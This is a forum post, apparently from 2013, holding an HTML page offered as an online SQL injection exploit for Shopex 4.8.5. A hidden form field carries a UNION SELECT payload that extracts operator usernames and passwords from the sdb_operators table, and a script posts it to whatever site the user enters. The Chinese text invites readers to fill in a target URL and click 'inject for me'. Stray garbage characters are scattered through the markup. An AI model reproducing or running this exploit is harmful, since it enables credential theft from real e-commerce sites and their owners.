<center>
2 b3 ~" h6 q( _" `# n<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>: e4 Z6 \3 ^# ~
<form action="" method="post" name="submit_url">
- [* T6 h* X% L8 O, V网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
6 |* I# c) x7 r0 ]8 r2 u+ Q2 S<input type="hidden" name="goods[goods_id]" value="3">
, y7 q# y; G' f1 q<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
, L3 A* I& a. V/ v9 g/ t. a<input type="submit" value="给我注入" onclick=fsubmit()>
" }7 v% Y0 C" p; a: }+ f</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
# ?- e: x S* p6 }' V8 ^; T
9 P1 S X7 M* h. I<script> 6 M3 B) K- |0 Z. E6 v4 p
function fsubmit(){ ( G2 s6 ]1 I( ]5 X- w' t) j9 A
form = document.forms[0]; & t6 u8 f+ B- z* l0 O5 r/ ~
form.action = form.url.value+'/?product-gnotify';
, D# O$ n1 [1 B4 e8 @* ]' Eform.submit(); % @# i1 L" o% [* E- e) y
} . k% ]% n9 N6 V- T
</script>1 F3 X* {: B7 l) L: i; S
|
发表于 2013-1-23 09:20:52
收藏
支持
反对